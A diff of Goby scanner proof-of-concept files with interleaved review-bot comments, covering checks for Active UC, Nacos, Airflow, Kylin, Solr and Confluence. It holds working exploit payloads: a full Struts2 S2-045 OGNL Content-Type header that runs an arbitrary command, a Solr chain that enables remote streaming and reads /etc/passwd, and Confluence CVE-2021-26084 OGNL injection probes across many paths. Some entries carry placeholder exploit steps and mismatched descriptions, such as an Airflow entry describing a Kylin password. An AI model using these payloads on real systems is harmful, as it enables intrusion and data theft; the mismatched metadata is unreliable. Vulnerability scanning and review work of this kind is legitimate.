+ "GobyVersion": "0.0.0"
 }
\ No newline at end of file
diff --git a/poc/Active_UC_index.action_RCE.json b/poc/Active_UC_index.action_RCE.json
index 496366f..5e85e6a 100644
--- a/poc/Active_UC_index.action_RCE.json
+++ b/poc/Active_UC_index.action_RCE.json
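Review bot: The `ExploitSteps` block added in the `@@ -62,6 +66,43 @@` hunk is an unedited template: it requests `/test.php` and passes when the body contains `test`, which has no relation to the `/api/dbstat/gettablessize` check in `ScanSteps`, while the metadata lines just above set `"HasExp": true`. A scanner that trusts this entry can report a confirmed exploit for any host that happens to serve such a page, so set `"HasExp": false` and drop the placeholder block. `"PostTime": "0000-00-00 00:00:00"` and `"GobyVersion": "0.0.0"` also discard the provenance the old side carried; keep the original values. The same template block recurs in the `@@ -71,6 +75,43 @@` and `@@ -51,6 +55,43 @@` hunks further down. Text appears to be missing from the page ahead of this hunk, so which file it patches should be confirmed against the repository.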
@@ -1,28 +1,29 @@
 {
- "Name": "Active UC index.action 远程命令执行漏洞",
+ "Name": "Active UC index.action RCE",
 "Level": "3",
 "Tags": [
 "RCE"
 ],
 "GobyQuery": "title=\"网动统一通信平台(Active UC)\"",
- "Description": "网动统一通信平台 Active UC index.action 存在S2-045远程命令执行漏洞, 通过漏洞可以执行任意命令",
- "Product": "网动统一通信平台(Active UC)",
- "Homepage": "https://gobies.org/",
- "Author": "luckying",
- "Impact": "",
- "Recommandation": "",
- "References": [
- "https://gobies.org/"
+ "Description": "",
+ "Product": "Active UC",
+ "Homepage": "http://www.iactive.com.cn/",
+ "Author": "",
+ "Impact": "Active UC index.action has a RCE vulnerability.",
+ "Recommendation": "update",
+ "References": [],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "Name": "cmd",
+ "Type": "input",
+ "Value": "whoami"
+ }
 ],
- "HasExp": true,
- "ExpParams": [
- {
- "name": "Cmd",
- "type": "input",
- "value": "whoami",
- "show": ""
- }
- ],
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
 "ScanSteps": [
 "AND",
 {
@@ -41,7 +42,7 @@
 "Pragma": "no-cache"
 },
 "data_type": "text",
- "data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170"
+ "data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170"
 },
 "ResponseTest": {
 "type": "group",
@@ -59,7 +60,7 @@
 "SetVariable": []
 }
 ],
- "ExploitSteps": [
+ "ExploitSteps": [
 "AND",
 {
 "Request": {
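Review bot: The metadata written by the `@@ -1,28 +1,29 @@` hunk is less useful for triage than what it replaces: `Description` becomes empty, the old text's S2-045 attribution is dropped, and `"Recommendation": "update"` does not say what to update. Keep the S2-045 reference in `Description` or `References` so a finding can be mapped to the vendor advisory and its fixed version. `Author` and the original `References` entry are also removed, which loses attribution for a file that is being copied between repositories. In the later `@@ -93,10 +94,10 @@` hunk, `"output|lastbody|undefined|undefined"` looks like missing fields serialised as the literal string `undefined`; confirm the consumer tolerates it or keep `"output|lastbody"`.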
@@ -72,12 +73,12 @@ "Connection": "close", "Cookie": "SessionId=96F3F15432E0660E0654B1CE240C4C36", "Charsert": "UTF-8", - "Content-Type": "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{Cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170", + "Content-Type": "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170", "Cache-Control": "no-cache", "Pragma": "no-cache" }, "data_type": "text", - "data": 
"-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170" + "data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170" }, "ResponseTest": { "type": "group", @@ -93,10 +94,10 @@ ] }, "SetVariable": [ - "output|lastbody" - ] + "output|lastbody|undefined|undefined" + ] } ], - "PostTime": "2021-06-28 10:08:54", - "GobyVersion": "1.8.268" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/poc/Alibaba_Nacos_Add_user_not_authorized.json b/poc/Alibaba_Nacos_Add_user_not_authorized.json index e9a08ef..c5933e8 100644 --- a/poc/Alibaba_Nacos_Add_user_not_authorized.json +++ b/poc/Alibaba_Nacos_Add_user_not_authorized.json @@ -2,39 +2,38 @@ "Name": "Alibaba Nacos Add user not authorized", "Level": "2", "Tags": [ - "Ultra vires" + "unauthorized" ], - "GobyQuery": "title==\"Nacos\"", - "Description": "On December 29, 2020, the Nacos official disclosed in the issue released by GitHub that there is an unauthorized access vulnerability in Alibaba Nacos due to improper handling of user agent. Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.", + "GobyQuery": "title=\"Nacos\"", + "Description": "Alibaba Nacos is an easy-to-use platform designed for dynamic service discovery and configuration and service management. It helps you to build cloud native applications and microservices platform easily.", "Product": "Alibaba Nacos", "Homepage": "https://github.com/alibaba/nacos", - "Author": "PeiQi", - "Impact": "Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.
Upgrade version
Log in to the background to view sensitive information
Upgrade version
",
- "References": [
- "http://wiki.peiqi.tech"
- ],
+ "Author": "",
+ "Impact": "There is a default weak password Nacos/Nacos in the Alibaba Nacos console. You can login to the background to view sensitive information (nacos/naocs).",
+ "Recommendation": "",
+ "References": [],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
 "ScanSteps": [
 "OR",
 {
@@ -71,6 +75,43 @@
 "SetVariable": []
 }
 ],
- "PostTime": "2021-04-04 18:56:41",
- "GobyVersion": "1.8.255"
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/test.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "test",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "0000-00-00 00:00:00",
+ "GobyVersion": "0.0.0"
 }
\ No newline at end of file
diff --git a/poc/Apache_Airflow_Unauthorized.json b/poc/Apache_Airflow_Unauthorized.json
index 1cc21ae..23d8bc4 100644
--- a/poc/Apache_Airflow_Unauthorized.json
+++ b/poc/Apache_Airflow_Unauthorized.json
@@ -1,18 +1,18 @@
 {
 "Name": "Apache Airflow Unauthorized",
- "Level": "3",
+ "Level": "2",
 "Tags": [
 "Unauthorized"
 ],
 "GobyQuery": "app=\"APACHE-Airflow\"",
- "Description": "remote attacker to gain unauthorized access to a targeted system",
+ "Description": "Airflow is a platform created by the community to programmatically author, schedule and monitor workflows.",
 "Product": "APACHE-Airflow",
 "Homepage": "https://airflow.apache.org/",
- "Author": "aetkrad",
- "Impact": "This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs
The attacker will log into the background as an administrator to further attack
",
- "Recommandation": "undefined
",
- "References": [
- "http://wiki.peiqi.tech"
- ],
+ "Author": "",
+ "Impact": "Apache kylin console has a default weak password of admin/KYLIN, which can be further exploited by login console.",
+ "Recommendation": "",
+ "References": [],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
 "ScanSteps": [
 "AND",
 {
@@ -51,6 +55,43 @@
 "SetVariable": []
 }
 ],
- "PostTime": "2021-04-04 15:51:21",
- "GobyVersion": "1.8.255"
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/test.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "test",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "0000-00-00 00:00:00",
+ "GobyVersion": "0.0.0"
 }
\ No newline at end of file
diff --git a/poc/Apache_Kylin_Unauthorized_configuration_disclosure.json b/poc/Apache_Kylin_Unauthorized_configuration_disclosure.json
index 17526a7..452be2f 100644
--- a/poc/Apache_Kylin_Unauthorized_configuration_disclosure.json
+++ b/poc/Apache_Kylin_Unauthorized_configuration_disclosure.json
@@ -1,28 +1,31 @@ { - "Name": "Apache Kylin Unauthorized configuration disclosure (CVE-2020-13937)", - "Level": "0", + "Name": "Apache Kylin API Unauthorized Access CVE-2020-13937", + "Level": "1", "Tags": [ - "Disclosure of Sensitive Information" + "unauthorized" ], "GobyQuery": "app=\"APACHE-kylin\"", - "Description": "Apache kylin has a restful API that exposes configuration information without authorization.\nAttackers can use this vulnerability to obtain sensitive information of the system.", + "Description": "Apache Kylin™ is an open source, distributed Analytical Data Warehouse for Big Data; it was designed to provide OLAP (Online Analytical Processing) capability in the big data era. By renovating the multi-dimensional cube and precalculation technology on Hadoop and Spark, Kylin is able to achieve near constant query speed regardless of the ever-growing data volume. Reducing query latency from minutes to sub-second, Kylin brings online analytics back to big data.", "Product": "Apache kylin", "Homepage": "http://kylin.apache.org/", - "Author": "PeiQi", - "Impact": "Attackers can use this vulnerability to obtain sensitive information of the system.
Upgrade to the safe version, or perform the following mitigation measures:
Edit \"$kylin\"_ HOME/WEB-INF/classes/ kylinSecurity.xml \";
Delete the following line \"< scr:intercept-url pattern= \"/api/admin/config\" access=\"permitAll\"/>\";
Restart the kylin instance to take effect.
", + "Author": "", + "Impact": "Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed Kylin's configuration information without any authentication, so it is dangerous because some confidential information entries will be disclosed to everyone.", + "Recommendation": "update", "References": [ - "http://wiki.peiqi.tech" + "https://nvd.nist.gov/vuln/detail/CVE-2020-13937" ], - "HasExp": true, - "ExpParams": [ - { - "name": "Config", - "type": "select", - "value": "/kylin/api/admin/config", - "show": "" - } - ], + "HasExp": true, + "ExpParams": [ + { + "Name": "Config", + "Type": "select", + "Value": "/kylin/api/admin/config" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -30,7 +33,7 @@ "method": "GET", "uri": "/kylin/api/admin/config", "follow_redirect": true, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -57,18 +60,18 @@ "SetVariable": [] } ], - "ExploitSteps": [ + "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/kylin/api/admin/config", "follow_redirect": true, - "header": {}, + "header": null, "data_type": "text", "data": "" }, - "ResponseTest": { + "ResponseTest": { "type": "group", "operation": "AND", "checks": [ @@ -89,10 +92,10 @@ ] }, "SetVariable": [ - "output|lastbody" - ] + "output|lastbody|undefined|undefined" + ] } ], - "PostTime": "2021-04-04 15:55:28", - "GobyVersion": "1.8.255" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/poc/Apache_Solr_File_Read.go b/poc/Apache_Solr_File_Read.go index 8633089..d696d53 100644 --- a/poc/Apache_Solr_File_Read.go +++ b/poc/Apache_Solr_File_Read.go 
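Review bot: The new `"Recommendation": "update"` in the `@@ -1,28 +1,31 @@` hunk drops the remediation the removed text carried: upgrade, or delete the `permitAll` intercept rule for `/api/admin/config` from kylinSecurity.xml and restart the instance. An operator reading a finding needs those steps, so I would keep them, e.g. `"Recommendation": "Upgrade to a fixed release, or remove the permitAll intercept-url entry for /api/admin/config from kylinSecurity.xml and restart Kylin."` The removed lines look partly garbled on this page, so the wording should be checked against the old file.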
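Review bot: `"output|lastbody|undefined|undefined"` in the `@@ -89,10 +92,10 @@` hunk looks like a serialiser writing JavaScript `undefined` into the third and fourth fields rather than an intended extraction rule; the old value was `output|lastbody`. The same hunk replaces `PostTime` and `GobyVersion` with `0000-00-00 00:00:00` and `0.0.0`, as most files in this commit do, which together with the blanked `Author` removes the record of who wrote the check and when. I would keep `"output|lastbody"` and carry the original `PostTime` and `GobyVersion` through the import.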
@@ -26,45 +26,11 @@ func init() { "Content": "" }, "ScanSteps": [ - "AND", - { - "Request": { - "method": "POST", - "uri": "/solr/core/debug/dump?param=ContentStreams", - "follow_redirect": true, - "header": {}, - "data_type": "text", - "data": "stream.url=file:///etc/passwd" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "root:x:0", - "bz": "" - } - ] - }, - "SetVariable": [] - } - ], - "ExploitSteps": [ "AND", { "Request": { "method": "GET", - "uri": "/test.php", + "uri": "/solr/admin/cores?indexInfo=false&wt=json", "follow_redirect": true, "header": {}, "data_type": "text", 
@@ -85,7 +51,107 @@ func init() { "type": "item", "variable": "$body", "operation": "contains", - "value": "test", + "value": "responseHeader", + "bz": "" + } + ] + }, + "SetVariable": [ + "core_name|lastbody|regex|\"name\":\"(.*?)\"" + ] + }, + { + "Request": { + "method": "POST", + "uri": "/solr/{{{core_name}}}/config", + "follow_redirect": true, + "header": { + "Content-Type": "application/json" + }, + "data_type": "text", + "data": "{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "responseHeader", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/solr/{{{core_name}}}/debug/dump?param=ContentStreams", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "stream.url=file:///etc/passwd" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "root", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "", "bz": "" } ] diff --git a/poc/Aspcms_Backend_Leak.json b/poc/Aspcms_Backend_Leak.json index 33d3b2c..9a05735 100644 --- a/poc/Aspcms_Backend_Leak.json 
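Review bot: The second added scan step POSTs `set-property` with `requestDispatcher.requestParsers.enableRemoteStreaming` set to `true` on the core it discovers, so a detection pass now changes the configuration of the system it is assessing, and nothing in the hunk sets it back. A scan should leave the asset as it found it: keep `ScanSteps` read-only, or if the write has to stay, restore the previous value afterwards and state in `Description` that the check modifies Solr configuration. The final body check was also loosened from `root:x:0` to `root`, which will match unrelated responses, and the new `ExploitSteps` has an empty `uri` and an empty `contains` value. The enclosing `init()` starts and ends outside the hunk.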
+++ b/poc/Aspcms_Backend_Leak.json @@ -5,11 +5,11 @@ "infoleak" ], "GobyQuery": "app=\"ASPCMS\"", - "Description": "aspcms /plug/oem/AspCms_OEMFun.asp leak backend url", + "Description": "aspCMS is a module based ASP Content Management System (CMS).", "Product": "ASPCMS", - "Homepage": "https://gobies.org/", - "Author": "aetkrad", - "Impact": "leak backend url
An OGNL injection vulnerability exists that would allow an authenticated user, and in some instances unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.
General repair suggestions:
Check and upgrade to the secure version based on the information in the affected version. The official download link is :https://www.atlassian.com/software/confluence/download-archives
Temporary repair suggestions:
If you are not ready to update the Confluence, please refer to the official notification calling for Mitigation for Linux and Windows operating systems.:https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
", + "Author": "", + "Impact": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.", + "Recommendation": "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", "References": [ - "https://github.com/alt3kx/CVE-2021-26084_PoC" + "https://nvd.nist.gov/vuln/detail/CVE-2021-26084", + "https://jira.atlassian.com/browse/CONFSERVER-67940", + "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html" ], "HasExp": true, "ExpParams": [ { - "Name": "command", + "Name": "Command", "Type": "input", "Value": "whoami" + }, + { + "Name": "Path", + "Type": "select", + "Value": "/pages/createpage-entervariables.action?SpaceKey=x,/pages/createpage-entervariables.action,/confluence/pages/createpage-entervariables.action?SpaceKey=x,/confluence/pages/createpage-entervariables.action,/wiki/pages/createpage-entervariables.action?SpaceKey=x,/wiki/pages/createpage-entervariables.action,/pages/doenterpagevariables.action,/pages/createpage.action?spaceKey=myproj,/pages/templates2/viewpagetemplate.action,/pages/createpage-entervariables.action,/template/custom/content-editor,/templates/editor-preload-container,/users/user-dark-features" } ], "ExpTips": { @@ -27,7 +34,7 @@ "Content": "" }, "ScanSteps": [ - "AND", + "OR", { "Request": { "method": "POST", 
@@ -37,12 +44,8 @@ "Content-Type": "application/x-www-form-urlencoded" }, "data_type": "text", - "data": "queryString=aaaaaaaa%5Cu0027%2B%7B{{{r1}}}%2B{{{r2}}}%7D%2B%5Cu0027", - "set_variable": [ - "r1|rand|int|8", - "r2|rand|int|7", - "r4|r1|add|r2" - ] + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] }, "ResponseTest": { "type": "group", 
@@ -59,14 +62,420 @@ "type": "item", "variable": "$body", "operation": "contains", - "value": "{{{r4}}}", + "value": "value=\"aaaa{140592=null}", "bz": "" } ] }, - "SetVariable": [ - "output|lastbody|regex|" - ] + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/pages/createpage-entervariables.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/confluence/pages/createpage-entervariables.action?SpaceKey=x", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/confluence/pages/createpage-entervariables.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + 
"value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/wiki/pages/createpage-entervariables.action?SpaceKey=x", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/wiki/pages/createpage-entervariables.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/pages/doenterpagevariables.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + 
"variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/pages/createpage.action?spaceKey=myproj", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/pages/templates2/viewpagetemplate.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/pages/createpage-entervariables.action", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": 
"value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/template/custom/content-editor", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/templates/editor-preload-container", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "POST", + "uri": "/users/user-dark-features", + "follow_redirect": true, + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "data_type": "text", + "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "value=\"aaaa{140592=null}", + "bz": "" + } + ] + }, + "SetVariable": [] } ], "ExploitSteps": [ 
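Review bot: `/pages/createpage-entervariables.action` appears twice among the twelve added scan steps (the first and the ninth), and twice in the new `Path` select list, so under `"OR"` the duplicate only adds a redundant request per asset. I would drop the repeated step and the repeated list entry. The steps otherwise differ only in `uri`; if the schema cannot iterate one request over a list of paths, listing the probed paths in `Description` would make the entry reviewable without reading four hundred near-identical lines.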
@@ -74,7 +483,7 @@ { "Request": { "method": "POST", - "uri": "/pages/createpage-entervariables.action?SpaceKey=x", + "uri": "{{{Path}}}", "follow_redirect": true, "header": { "Content-Type": "application/x-www-form-urlencoded" @@ -101,6 +510,6 @@ ] } ], - "PostTime": "2021-09-03 11:27:04", - "GobyVersion": "1.8.300" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/poc/Cacti_Weathermap_File_Write.json b/poc/Cacti_Weathermap_File_Write.json index b3c1e1d..440107e 100644 --- a/poc/Cacti_Weathermap_File_Write.json +++ b/poc/Cacti_Weathermap_File_Write.json @@ -4,12 +4,12 @@ "Tags": [ "getshell" ], - "GobyQuery": "(app=\"cacti-监控系统\"|title=\"Login to Cacti\"|app=\"Cactiez\")", - "Description": "allows remote attackers to upload and execute arbitrary files", - "Product": "cacti-监控系统", + "GobyQuery": "app=\"cacti-监控系统\" || title=\"Login to Cacti\" || app=\"Cactiez\"", + "Description": "Cacti provides a robust and extensible operational monitoring and fault management framework for users around the world. Is also a complete network graphing solution designed to harness the power of RRDTool's data storage and graphing functionality.", + "Product": "cacti", "Homepage": "https://www.cacti.net/", - "Author": "aetkrad", - "Impact": "Remote attacker can use to replace web application files with malicious code and perform remote code execution on the system.
resulting in unauthorized access to sensitive information
暂无
", - "Recommandation": "暂无
